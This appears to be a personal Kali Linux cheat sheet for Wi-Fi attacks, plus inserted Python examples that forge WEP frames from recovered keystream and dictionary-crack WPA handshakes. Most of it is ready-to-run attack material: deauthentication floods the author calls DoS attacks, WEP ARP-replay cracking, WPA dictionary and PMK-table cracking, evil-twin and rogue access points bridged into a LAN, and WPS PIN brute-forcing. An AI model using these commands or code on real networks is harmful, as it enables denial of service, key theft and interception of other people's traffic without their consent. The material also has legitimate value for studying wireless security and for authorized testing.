Progmar Marcin Załęczny


Wi-fi penetration testing in Kali Linux

Displays all TCP connections (-t) without resolving host names (-n): netstat -nt

Displays the TCP ports the computer is listening on (-l), again without name resolution: netstat -ntl

Turns on packet forwarding between networks (router functionality); note that the sysctl needs the value, not just the key name: sysctl -w net.ipv4.ip_forward=1

Scanning for wi-fi networks accessible for wlan0 interface: iw dev wlan0 scan

Displays information about the Wi-Fi network the wlan0 interface is connected to: iw dev wlan0 link

Connects to the specified unprotected Wi-Fi network: iw dev wlan0 connect network_name

Displays wireless network interfaces list: iwconfig

Activates wlan0 network interface: ifconfig wlan0 up

Displays status of wlan0 network interface: ifconfig wlan0

Displays detailed information on access points found: iwlist wlan0 scanning

Connects to unprotected wifi network: iwconfig wlan0 essid "my network"

Connects to a WEP-protected Wi-Fi network (the key is given as hex digits, or as ASCII with the s: prefix, e.g. key s:abcde): iwconfig wlan0 essid "my network" key WEP_key_of_the_network

To connect to a WPA-protected Wi-Fi network you have to use wpa_supplicant and a configuration file:

  1. Create the file ~/wpa_network.conf with the following content. This block describes WPA (version 1) with TKIP; for a WPA2 network use proto=RSN, pairwise=CCMP and group=CCMP. The passphrase is stored in clear text, so restrict the file with chmod 600:
    network={
        ssid="my network"
        key_mgmt=WPA-PSK
        proto=WPA
        pairwise=TKIP
        group=TKIP
        psk="password_to_WPA_protected_wifi"
    }
  2. Next issue the following command (-D wext is the legacy driver interface; on current kernels -D nl80211 is the one to use):
    wpa_supplicant -D wext -i wlan0 -c wpa_network.conf

After connecting to a Wi-Fi network you can obtain an IP address from the network's DHCP server with (the binary is dhclient; old Debian releases shipped it as dhclient3): dhclient wlan0

Displays routing table without resolving host names: route -n

Lists all wifi adapters that can work in the monitor mode: airmon-ng

Switches the chosen Wi-Fi adapter to monitor mode: airmon-ng start wlan0
If the program reports that switching is impossible because of interfering processes (they are listed together with their PIDs), kill them with: airmon-ng check kill
Then try once again to switch the adapter to monitor mode; this time it should succeed. You can confirm that with: airmon-ng
It will show the new monitor interface that was created: wlan0mon

Switches off monitor mode on the interface: airmon-ng stop wlan0mon

To capture packets in Wireshark you need capture privileges: either run it as root or, on Debian/Kali, add your user to the wireshark group (dpkg-reconfigure wireshark-common, then usermod -aG wireshark <user>), which keeps the GUI out of root. Then open the menu Capture -> Interfaces... (Capture -> Options in current versions), select the monitor-mode interface (wlan0mon) in the dialog box and click the Start button.

To make Wireshark show only management frames, fill the Filter entry with the condition below and press the Apply button: wlan.fc.type == 0

To make Wireshark show only control frames: wlan.fc.type == 1

To make Wireshark show only data frames: wlan.fc.type == 2

To display only frames of a specified type and subtype, combine both conditions. For example, management frames of the Beacon subtype (Beacons are management frames, not control frames): (wlan.fc.type == 0) && (wlan.fc.subtype == 8)
Probe Request frames: (wlan.fc.type == 0) && (wlan.fc.subtype == 4)
Probe Response frames: (wlan.fc.type == 0) && (wlan.fc.subtype == 5)
Deauthentication frames: (wlan.fc.type == 0) && (wlan.fc.subtype == 0x0c)
Reassociation Request frames: (wlan.fc.type == 0) && (wlan.fc.subtype == 2)
Reassociation Response frames: (wlan.fc.type == 0) && (wlan.fc.subtype == 3)
To reveal hidden Wi-Fi networks, monitor Probe Request/Probe Response frames. A hidden network's Beacons carry an empty SSID element, but a client that already knows the network sends a directed Probe Request naming the SSID just before it connects, and the AP answers with a Probe Response that repeats it; both are sent in plain text (the Association Request that follows carries the SSID as well).

Displays frames sent or received by the interface with the specified MAC address: wlan.addr == cc:cc:cc:cc:cc:cc

Displays all frames except Beacons sent or received by the interface with the specified MAC address: (wlan.addr==00:14:bf:8f:b1:f5) && !(wlan.fc.type_subtype==0x08)

To make a filter basing on appropriate selection in the frame details in the Wireshark, you should right-click chosen field and from the context menu select option: Apply as Filter -> Selected. This causes the Filter entry to fill in with proper condition.
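The filters above all key off the two Frame Control bytes at the start of every 802.11 frame. The following added example (not part of the original page) decodes that field into the type, subtype and type_subtype values Wireshark exposes, parses a management frame's tagged parameters, and correlates hidden Beacons with the Probe Responses that reveal the SSID. The frames, MAC addresses and SSID in it are constructed test data, not a real capture.

```python
import struct

MGMT, CTRL, DATA = 0, 1, 2
SUBTYPES = {  # (type, subtype) -> name, management frames only
    (0, 0): "Association Request", (0, 1): "Association Response",
    (0, 2): "Reassociation Request", (0, 3): "Reassociation Response",
    (0, 4): "Probe Request", (0, 5): "Probe Response",
    (0, 8): "Beacon", (0, 0xB): "Authentication", (0, 0xC): "Deauthentication",
}


def parse_frame_control(fc: bytes):
    """Split the 2-byte Frame Control field into (type, subtype, type_subtype).
    Byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
    type_subtype is the value Wireshark shows as wlan.fc.type_subtype."""
    b0 = fc[0]
    ftype = (b0 >> 2) & 0x3
    subtype = (b0 >> 4) & 0xF
    return ftype, subtype, (ftype << 4) | subtype


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt(frame: bytes) -> dict:
    """Parse a management frame header plus its tagged parameters (no FCS)."""
    ftype, subtype, ts = parse_frame_control(frame[0:2])
    if ftype != MGMT:
        return {"type_subtype": ts, "name": "non-management"}
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    body = frame[24:]
    if subtype in (5, 8):          # Beacon / Probe Response carry 12 fixed bytes
        body = body[12:]           # timestamp(8) + interval(2) + capabilities(2)
    ssid = None
    i = 0
    while i + 2 <= len(body):      # walk the tag/length/value elements
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if tag == 0:               # element 0 is the SSID
            ssid = value.decode("utf-8", "replace")
        i += 2 + length
    hidden = ssid is not None and (ssid == "" or set(ssid) == {"\x00"})
    return {"type_subtype": ts, "name": SUBTYPES.get((ftype, subtype), "?"),
            "da": mac_str(addr1), "sa": mac_str(addr2), "bssid": mac_str(addr3),
            "ssid": ssid, "hidden": hidden}


def build_mgmt(subtype: int, da: bytes, sa: bytes, bssid: bytes, ssid: bytes) -> bytes:
    """Build a minimal management frame (constructed test data, no FCS)."""
    fc = bytes([(MGMT << 2) | (subtype << 4), 0x00])
    hdr = fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00"   # duration, addrs, seq ctrl
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411) if subtype in (5, 8) else b""
    return hdr + fixed + bytes([0, len(ssid)]) + ssid


def reveal_hidden_ssids(frames) -> dict:
    """Correlate hidden Beacons with Probe Responses from the same BSSID,
    returning {bssid: revealed_ssid}."""
    hidden, revealed = set(), {}
    for f in frames:
        p = parse_mgmt(f)
        if p["name"] == "Beacon" and p["hidden"]:
            hidden.add(p["bssid"])
        elif p["name"] == "Probe Response" and p["ssid"]:
            revealed[p["bssid"]] = p["ssid"]
    return {b: s for b, s in revealed.items() if b in hidden}


# Constructed sample: hidden Beacon, directed Probe Request, Probe Response.
AP = bytes.fromhex("0014bfb152de")
CLIENT = bytes.fromhex("0014bf8fb1f5")
BCAST = b"\xff" * 6
SAMPLE_FRAMES = [
    build_mgmt(8, BCAST, AP, AP, b""),                       # Beacon, SSID hidden
    build_mgmt(4, BCAST, CLIENT, BCAST, b"linksys_devel"),   # client probes by name
    build_mgmt(5, CLIENT, AP, AP, b"linksys_devel"),         # AP answers in clear
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        p = parse_mgmt(f)
        print(f"type_subtype=0x{p['type_subtype']:02x} {p['name']:22} ssid={p['ssid']!r}")
    print("revealed:", reveal_hidden_ssids(SAMPLE_FRAMES))
```

The same decoding applies to the wlan.fc.type_subtype literals used later on this page: Beacon is 0x08 and a plain data frame is 0x20 (type 2, subtype 0).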

Displays information (signal strength, channel, encryption, etc.) about the access point with the specified MAC address: airodump-ng --bssid 70:62:b8:65:c8:58 wlan0mon

As above, but only channel 2 is monitored and only the clients associated with the specified access point are listed (-a filters out unassociated clients): airodump-ng -c 2 -a --bssid 70:62:b8:65:c8:58 wlan0mon

Writes the traffic between the specified access point and its clients to files whose names begin with "keystream" or "WEPCrack": airodump-ng wlan0mon -c 2 --bssid 70:62:b8:65:c8:58 -w keystream or airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
If airodump-ng sees a client perform shared-key (SKA) authentication while writing, it also saves the recovered RC4 keystream as <prefix>-<bssid>.xor next to the capture; that is the file used for fake shared-key authentication below.

Making the wifi interface to work on a specified (10) channel: iwconfig wlan0mon channel 10

Wireshark filter which displays only packets sent/received by a specified access point: wlan.bssid == 70:62:b8:65:c8:58

Wireshark filter which displays only data packets sent/received by a specified access point: (wlan.bssid == 70:62:b8:65:c8:58) && (wlan.fc.type_subtype == 0x20)

Wireshark filter which displays all packets sent/received by a specified access point but the broadcast ones (Beacon): (wlan.bssid == 70:62:b8:65:c8:58) && !(wlan.fc.type_subtype == 0x08)

Injection test (-9): checks whether the interface can inject frames and whether the specified access point (given by ESSID and MAC address) answers them: aireplay-ng -9 -e Linksys -a 70:62:b8:65:c8:58 wlan0mon

Sends Deauthentication frames (5 bursts) on behalf of the access point with the given MAC address, which makes the Wi-Fi clients disconnect and reconnect, so their handshake can be captured: aireplay-ng -0 5 -a 70:62:b8:65:c8:58 wlan0mon
If aireplay-ng complains that the interface's channel is -1, add --ignore-negative-one: aireplay-ng -0 5 -a 70:62:b8:65:c8:58 --ignore-negative-one wlan0mon

As above, but the Deauthentication frames are addressed to the specified wireless client (-c option). This is a demo of a DoS attack: aireplay-ng -0 35 -a 00:14:BF:B1:52:DE -c 00:14:BF:8F:B1:F5 wlan1mon

Sends Deauthentication frames on behalf of the access point with the given MAC address (-a option) until CONTROL+C is pressed. This is a DoS attack against all Wi-Fi clients that try to connect to the access point: aireplay-ng -0 0 -a 00:14:BF:B1:52:DE --ignore-negative-one wlan1mon

Fake shared-key authentication (-1 0): uses the RC4 keystream saved in the keystream-*.xor file (-y) to answer the challenge of the access point specified after -a, authenticating as the client MAC address given after -h: aireplay-ng -1 0 -e Linksys -y keystream-70:62:b8:65:c8:58.xor -a 70:62:b8:65:c8:58 -h cc:cc:cc:cc:cc:cc wlan0mon

ARP request replay (-3): captures ARP requests and re-injects them on behalf of the specified Wi-Fi client (-h option) into the network of the specified access point (-b option), so the AP generates new IVs quickly: aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon

Cracking the WEP key from the collected IVs: aircrack-ng WEPCrack-01.cap
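The fake-authentication and ARP-replay entries above both rest on one WEP property: RC4 is seeded with the 3-byte IV and the secret key, so any frame whose plaintext is known (the 128-byte cleartext challenge of a shared-key authentication, or an ARP request whose LLC/SNAP header and fixed fields are predictable) gives away the keystream for that IV, and that keystream can encrypt a new frame under the same IV without the key. The following added example (not part of the original page, and not aircrack-ng code) implements WEP with plain RC4 and CRC-32, recovers the keystream from a known-plaintext frame and forges a different ARP request with it; the key, IV, MAC and IP addresses are constructed test data.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 (KSA + PRGA). WEP seeds it with the 3-byte IV prepended to the secret key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV(3) || key-id byte || RC4_{IV||key}(plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """What the AP does: returns the plaintext if the ICV verifies, else None."""
    pt = rc4(body[:3] + key, body[4:])
    data = pt[:-4]
    return data if pt[-4:] == icv(data) else None


def recover_keystream(body: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext XOR ciphertext = the RC4 keystream for this IV.
    That keystream is what a keystream-*.xor file holds; it is all an attacker
    needs to encrypt frames under the same IV, without the WEP key."""
    full = known_plaintext + icv(known_plaintext)
    return bytes(c ^ p for c, p in zip(body[4:], full))


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Encrypt an arbitrary frame with a recovered keystream; it only works
    for frames no longer than the keystream."""
    full = plaintext + icv(plaintext)
    if len(full) > len(keystream):
        raise ValueError("keystream shorter than the frame to forge")
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(full, keystream))


# Constructed data: a 40-bit key, one IV and ARP requests whose LLC/SNAP
# header (aa aa 03 00 00 00 08 06) and fixed ARP fields are predictable.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("0a0b0c")
SNAP_ARP = bytes.fromhex("aaaa030000000806")


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    # htype=1 (Ethernet), ptype=0x0800, hlen=6, plen=4, op=1 (request)
    return (SNAP_ARP + struct.pack(">HHBBH", 1, 0x0800, 6, 4, 1)
            + sender_mac + sender_ip + b"\x00" * 6 + target_ip)


ARP_SEEN = arp_request(bytes.fromhex("0014bf8fb1f5"), bytes([192, 168, 0, 10]), bytes([192, 168, 0, 1]))
ARP_FORGED = arp_request(bytes.fromhex("cccccccccccc"), bytes([192, 168, 0, 66]), bytes([192, 168, 0, 1]))

if __name__ == "__main__":
    captured = wep_encrypt(KEY, IV, ARP_SEEN)          # frame sniffed from the air
    ks = recover_keystream(captured, ARP_SEEN)         # keystream-<bssid>.xor
    forged = forge_frame(IV, ks, ARP_FORGED)           # no key involved
    print("AP accepts forged frame:", wep_decrypt(KEY, forged) == ARP_FORGED)
```

The forged frame is limited to the keystream length, which is why a sniffed shared-key authentication (challenge plus header, well over 128 bytes) is so useful for aireplay-ng -1, and why replaying a captured ARP request (aireplay-ng -3) is the cheapest way to make the AP burn through IVs for aircrack-ng.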

Sets the regulatory domain of the Wi-Fi card to the specified country (Poland, the United States), which determines the permitted channels and transmit power: iw reg set PL
iw reg set US

Sets specified mac address for a wlan0 interface: macchanger -m <mac> wlan0

In Wireshark, the packets (from a *.cap file or a live capture) that carry the WPA/WPA2 four-way handshake have the value EAPOL in the Protocol column and a string like "Key (Message 1 of 4)" in the Info column.

Dictionary cracking of a WPA/WPA2 passphrase from a capture containing the handshake: aircrack-ng linksys-01.cap -w file_with_passwords.txt
Speeds up dictionary cracking by precomputing the PMKs for a given SSID; the table is valid only for that SSID, because the SSID is the PBKDF2 salt: genpmk -f dictionary_file.txt -d computed_PMK_keys.txt -s Linksys
Uses the precomputed PMKs to find the passphrase: cowpatty -d computed_PMK_keys.txt -s Linksys -r linksys-01.cap
To use the file generated by genpmk in aircrack-ng, import it into an airolib-ng database first: airolib-ng PMK_for_aircrack.txt --import cowpatty computed_PMK_keys.txt
Then run: aircrack-ng -r PMK_for_aircrack.txt linksys-01.cap
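What aircrack-ng, genpmk and cowpatty do with those EAPOL frames is a fixed derivation: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID), PTK = PRF-512(PMK, both MACs, both nonces), and the MIC in Message 2 is HMAC-SHA1-128 under the first 16 bytes of the PTK (the KCK). The following added example (not the page's or aircrack-ng's code) carries that through in Python: it derives the PMK, builds an EAPOL-Key Message 2 of 4, and runs a dictionary attack with and without a precomputed per-SSID PMK table. The handshake is constructed from a known passphrase so the result can be checked; the SSID, MACs, nonces and word list are test data. The only external value is the IEEE 802.11i test vector (passphrase "password", SSID "IEEE") used to check the PMK step.

```python
import hashlib
import hmac
import struct

# Constructed scenario, not a real capture.
SSID = "Linksys"
AP_MAC = bytes.fromhex("7062b865c858")
STA_MAC = bytes.fromhex("cccccccccccc")
ANONCE = bytes(range(32))          # stand-in for the nonce from Message 1
SNONCE = bytes(range(32, 64))      # stand-in for the nonce from Message 2
TRUE_PASSPHRASE = "S3cretWifi!"
WORDLIST = ["password", "letmein", "linksys", TRUE_PASSPHRASE, "12345678"]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The SSID is the salt, so a genpmk table is valid for exactly one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 with label "Pairwise key expansion" over
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]                 # KCK = PTK[0:16] signs the EAPOL frames


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key Message 2 of 4: RSN descriptor, key-info 0x010a
    (descriptor version 2 = HMAC-SHA1 MIC, pairwise, MIC present).
    In the resulting frame SNonce sits at bytes 17..49 and the MIC at 81..97."""
    body = (b"\x02" + struct.pack(">HHQ", 0x010a, 16, 1)       # type, info, key len, replay ctr
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + mic + struct.pack(">H", 0))                       # MIC, key data length
    return b"\x02\x03" + struct.pack(">H", len(body)) + body   # EAPOL v2, type Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    zeroed = frame[:81] + b"\x00" * 16 + frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_capture(passphrase: str) -> dict:
    """Produce what an attacker reads from a real capture: ANonce and signed Message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE))
    return {"anonce": ANONCE, "msg2": build_eapol_msg2(SNONCE, mic)}


def precompute_pmks(wordlist, ssid: str) -> dict:
    """The genpmk step: the expensive PBKDF2 per word, done once per SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


def crack(capture: dict, wordlist, ssid: str = SSID, pmk_table: dict = None):
    """The aircrack-ng / cowpatty step: derive the KCK per candidate and compare MICs."""
    msg2 = capture["msg2"]
    snonce, captured_mic = msg2[17:49], msg2[81:97]
    for word in wordlist:
        pmk = pmk_table[word] if pmk_table else pmk_from_passphrase(word, ssid)
        kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, capture["anonce"], snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return word
    return None


if __name__ == "__main__":
    cap = make_capture(TRUE_PASSPHRASE)
    print("found:", crack(cap, WORDLIST))
    print("found via PMK table:", crack(cap, WORDLIST, pmk_table=precompute_pmks(WORDLIST, SSID)))
```

Only the PBKDF2 step depends on the SSID and not on the capture, which is why genpmk/airolib-ng tables pay off when the same SSID is attacked repeatedly but are useless against any other network name.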

Decrypts captured WEP packets with the recovered key: airdecap-ng -w found_wep_key WEPCrack-01.cap

Decrypts captured WPA/WPA2-PSK packets with the recovered passphrase (the capture must include the client's handshake): airdecap-ng -p password_found WPACrack-01.cap -e Linksys

Creates an evil twin access point, i.e. an AP that imitates an existing AP (linksys_devel) working on channel 11. The AP created this way has the ESSID "default", periodically switching to "linksys_devel". The nearest Wi-Fi clients will connect to it: airbase-ng --essid linksys_devel -c 11 wlan1mon

As above, but it creates an evil twin that is harder to detect, one with the same MAC address as the original AP. However, in my tests it was harder to make Wi-Fi clients connect to such an AP: airbase-ng -a 00:14:BF:B1:52:DE --essid linksys_devel -c 11 wlan1mon

Creates an open access point (no encryption): airbase-ng --essid linksys_devel -a 11:11:11:11:11:11 -c 11 wlan1mon

Creates an access point that advertises WEP: airbase-ng --essid linksys_devel -a 22:22:22:22:22:22 -c 11 -W 1 wlan1mon

Creates an access point that advertises WPA-PSK with TKIP: airbase-ng --essid linksys_devel -a 33:33:33:33:33:33 -c 11 -W 1 -z 2 wlan1mon

Creates an access point that advertises WPA2-PSK with TKIP (use -Z 4 to advertise CCMP/AES instead; the -z/-Z cipher numbers are 1=WEP40, 2=TKIP, 3=WRAP, 4=CCMP, 5=WEP104): airbase-ng --essid linksys_devel -a 44:44:44:44:44:44 -c 11 -W 1 -Z 2 wlan1mon
airbase-ng only advertises these cipher suites in its beacons and does not run a real encrypted session; the WPA/WPA2 variants are used to lure clients and collect their handshake messages for offline cracking.

Detects access points that have WPS enabled: wash --ignore-fcs -i wlan0mon
Brute-forces the WPS PIN of the specified access point (-vv for verbose output): reaver -i wlan0mon -b 11:22:33:44:55:66 -vv

Monitors Probe Request frames in the terminal (the capture filter is given with -f): tshark -n -i wlan0mon -f "subtype probereq"
As above, but the output contains only the client's MAC address and the SSID it is probing for; the field separator is set with -E, and in Wireshark releases before 2.x the SSID field was called wlan_mgt.ssid rather than wlan.ssid: tshark -n -i wlan0mon -f "subtype probereq" -T fields -E separator=, -e wlan.sa -e wlan.ssid

How to configure a rogue access point bridged into a wired LAN:

  1. Switch the Wi-Fi card to monitor mode: airmon-ng start wlan0
  2. Create the access point: airbase-ng --essid Test -c 11 wlan0mon
  3. Make sure bridge-utils is installed (brctl is deprecated; ip link add name my-bridge type bridge does the same on current systems): apt-get install bridge-utils
  4. Create a bridge: brctl addbr my-bridge
  5. Add the eth1 interface (the LAN you are connected to) and the at0 interface (the tap interface created by airbase-ng in step 2) to the my-bridge bridge: brctl addif my-bridge at0
    brctl addif my-bridge eth1
  6. Bring up both the at0 and eth1 interfaces without addresses of their own: ifconfig at0 0.0.0.0 up
    ifconfig eth1 0.0.0.0 up
  7. Configure the IP address of the bridge: ifconfig my-bridge 192.168.0.180 up
  8. Enable packet forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  9. Replace the default gateway with the LAN's router: ip route del default
    ip route add default via 192.168.0.1

The process of cracking a WEP key:

  1. In the first terminal window issue the command (described earlier) that captures traffic from the target AP on its channel: airodump-ng wlan0mon --bssid 00:14:BF:B1:52:DE --channel 11 --write WEPCrack
  2. In the second terminal window start the ARP replay (described earlier), using the MAC address of a client associated with the AP as -h, to make the AP generate new IVs quickly: aireplay-ng -3 -b 00:14:BF:B1:52:DE -h 00:14:BF:8F:B1:F5 wlan0mon
  3. In the third terminal window run the cracker (described earlier); it re-reads the capture file as IVs accumulate and succeeds once enough have been collected: aircrack-ng WEPCrack-01.cap